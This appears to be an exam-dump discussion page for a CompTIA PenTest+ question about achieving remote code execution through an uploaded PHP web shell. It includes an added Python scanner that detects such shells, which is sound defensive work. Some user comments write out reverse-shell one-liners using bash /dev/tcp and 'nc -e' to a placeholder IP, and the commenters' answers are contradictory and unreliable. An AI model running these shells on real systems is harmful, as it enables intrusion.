
CompTIA Exam PT0-002 Topic 1 Question 53 Discussion

Actual exam question for CompTIA's PT0-002 exam
Question #: 53
Topic #: 1

During an engagement, a penetration tester was able to upload to a server a PHP file with the following content:

Which of the following commands should the penetration tester run to successfully achieve RCE?

Suggested Answer: A

The PHP file uploaded by the penetration tester allows for Remote Code Execution (RCE) by executing the command supplied through the cmd POST parameter. To exploit this, the penetration tester needs to send a POST request to the PHP file with the command they want to execute.

Among the given options, Option A is the most suitable for achieving RCE:

It uses Python's requests library to send a POST request, which is appropriate because the PHP script expects data through the POST method.

The data parameter in the requests.post function is correctly formatted as a dictionary, which is the expected format for sending form data in POST requests. It includes the key cmd with the value id, which is a common command used to display the current user ID and group ID.

The only minor issue with Option A is that it prints the response object itself rather than the response body, so the output of the id command would not be displayed. Appending .text to the requests.post call would print the body, but this is a small detail and does not affect the execution of the command.

The other options have various issues:

Option B is close but has a syntax error in the data argument. It uses parentheses () instead of curly braces {} for the dictionary, and also lacks the .text at the end to print the response content.

Options C and D use the requests.get method, which is not suitable in this scenario because the PHP script is expecting data through the POST method, not the GET method. Additionally, Option D has a syntax error similar to Option B.
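The scenario above (a PHP file sitting in an upload directory that runs whatever arrives in the cmd POST parameter, e.g. the system($_POST['cmd']) one-liner commenters below describe) is what a defender wants to catch on disk. The following is an added example, not from the exam or this site: a small Python scanner that flags any server-side script under an upload directory and any line that hands request data to a shell or to eval. The function list, the regexes, the extension list and the sample file contents are my own assumptions.

```python
import re
from pathlib import Path
from typing import NamedTuple

# PHP functions that hand their argument to a shell or to the PHP interpreter.
EXEC_FUNCS = ("system", "exec", "shell_exec", "passthru", "popen",
              "proc_open", "eval", "assert")
# Request superglobals: anything read from them is attacker-controlled.
USER_INPUT = r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\["

# Matches e.g. system($_POST['cmd']) or shell_exec("ls " . $_GET["d"]):
# an exec function whose argument list reaches a request superglobal.
SHELL_RE = re.compile(
    r"\b(?P<func>" + "|".join(EXEC_FUNCS) + r")\s*\([^;]*?" + USER_INPUT,
    re.IGNORECASE,
)
# The backtick operator is shell_exec() in disguise: `$_POST['cmd']`
BACKTICK_RE = re.compile(r"`[^`]*" + USER_INPUT)
# Extensions a typical PHP handler will execute (assumed list).
PHP_SUFFIXES = {".php", ".phtml", ".php3", ".php5", ".phar"}


class Finding(NamedTuple):
    path: str
    line: int      # 0 means the finding is about the file itself
    reason: str


def scan_php_source(path: str, source: str) -> list[Finding]:
    """Flag lines that execute request-controlled data."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        m = SHELL_RE.search(line)
        if m:
            func = m.group("func").lower()
            findings.append(Finding(path, lineno, f"{func}() executes request data"))
        elif BACKTICK_RE.search(line):
            findings.append(Finding(path, lineno, "backtick shell on request data"))
    return findings


def scan_upload_dir(root: Path) -> list[Finding]:
    """Any server-side script under an upload directory is suspect; scan it too."""
    findings = []
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix.lower() in PHP_SUFFIXES:
            findings.append(Finding(str(p), 0, "server-side script in upload directory"))
            findings.extend(scan_php_source(str(p), p.read_text(errors="replace")))
    return findings
```

Pointing scan_upload_dir at the web server's upload directory also catches the simpler failure: a file there that should never be executable at all, which is why the real fix is an extension allowlist plus storing uploads outside the document root.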


Contribute your Thoughts:

Nguyet
10 months ago
Mila: Option C looks like it would allow the penetration tester to execute arbitrary commands, achieving RCE.
upvoted 0 times
...
Marla
10 months ago
Marla: Can you explain why you think Option C is the right choice?
upvoted 0 times
...
Mila
10 months ago
Mila: I disagree, I believe the correct command is Option C.
upvoted 0 times
...
Nida
10 months ago
Catalina: Option B seems like it would execute the command stored in $_POST['cmd'], leading to remote code execution.
upvoted 0 times
...
Catalina
10 months ago
Why do you say that? What's your reasoning?
upvoted 0 times
...
Serina
11 months ago
I think the correct command to run is Option B.
upvoted 0 times
...
Veda
11 months ago
Option C looks like it would allow the penetration tester to execute arbitrary commands, achieving RCE.
upvoted 0 times
...
Margart
11 months ago
Can you explain why you think Option C is the right choice?
upvoted 0 times
...
Ciara
11 months ago
I disagree, I believe the correct command is Option C.
upvoted 0 times
...
Nickie
11 months ago
Option B seems like it would execute the command stored in $_POST['cmd'], leading to remote code execution.
upvoted 0 times
...
Shelton
11 months ago
Why do you say that? What's your reasoning?
upvoted 0 times
...
Ernie
11 months ago
I think the correct command to run is Option B.
upvoted 0 times
...
Sylvie
1 year ago
Hmm, I'm not sure any of these options are quite right. We need to think outside the box here. Maybe something like 'python -c 'import os; os.system("whoami")'' or 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'.
upvoted 0 times
Renato
10 months ago
Good idea. Let's give it a try.
upvoted 0 times
...
Jeffrey
10 months ago
That won't work. Let's try 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' instead.
upvoted 0 times
...
Cristal
11 months ago
Option D
upvoted 0 times
...
...
Jackie
1 year ago
I bet the answer is going to be something like 'nc' or 'netcat' to establish a reverse shell. That's the go-to for RCE, right?
upvoted 0 times
...
Justine
1 year ago
Hmm, let me think about this. The PHP file is executing whatever command is passed in the 'cmd' parameter via POST. So we need to find a command that will give us remote access.
upvoted 0 times
...
Brittni
1 year ago
You know, I bet the answer is something like 'nc -e /bin/bash 10.10.10.10 4444'. That's a classic. But then again, they might be trying to throw us off with something more obscure.
upvoted 0 times
...
Theron
1 year ago
Yeah, this is a classic RCE scenario. I'm guessing the answer has something to do with the 'system' function in the PHP file.
upvoted 0 times
...
Ahmed
1 year ago
Wow, this is a pretty straightforward question. The PHP file they were able to upload allows remote command execution (RCE), so we just need to figure out the correct command to run.
upvoted 0 times
...
Willie
1 year ago
I don't know, guys. This feels a little too easy. The real challenge is going to be figuring out which command will give us the most useful information without tipping our hand. We need to be surgical here.
upvoted 0 times
Alaine
11 months ago
I think we should go with Option D. It might reveal the most valuable information without drawing attention.
upvoted 0 times
...
Lorean
12 months ago
Let's stick with Option C for now and see what we can uncover.
upvoted 0 times
...
Owen
12 months ago
Option B might be the best bet to gather the necessary information discreetly.
upvoted 0 times
...
Sage
12 months ago
What if we try Option D? It could give us the insight we need without causing any issues.
upvoted 0 times
...
Rosita
12 months ago
I agree, Option C could provide valuable data without alerting anyone.
upvoted 0 times
...
Anisha
12 months ago
I think Option B might give us more useful information without raising any suspicions.
upvoted 0 times
...
Shantay
12 months ago
Let's go with Option A. It seems like the safest choice for now.
upvoted 0 times
...
...
Amber
1 year ago
Haha, 'cmd'? Really? That's just begging to be exploited. I bet the answer is something like 'whoami' or 'ls -la'. Let's see if any of these options are that obvious.
upvoted 0 times
...
Alesia
1 year ago
I agree, this question really separates the script kiddies from the real pros. Let's see, the PHP code they've provided looks like it's just executing whatever command is passed to it via the 'cmd' POST parameter. Hmm, this is going to be a tough one.
upvoted 0 times
...
Bernardo
1 year ago
Wow, this question is a real challenge! I'm glad they're testing us on something practical like RCE (Remote Code Execution) attacks. This is the kind of stuff we need to know to be effective penetration testers.
upvoted 0 times
...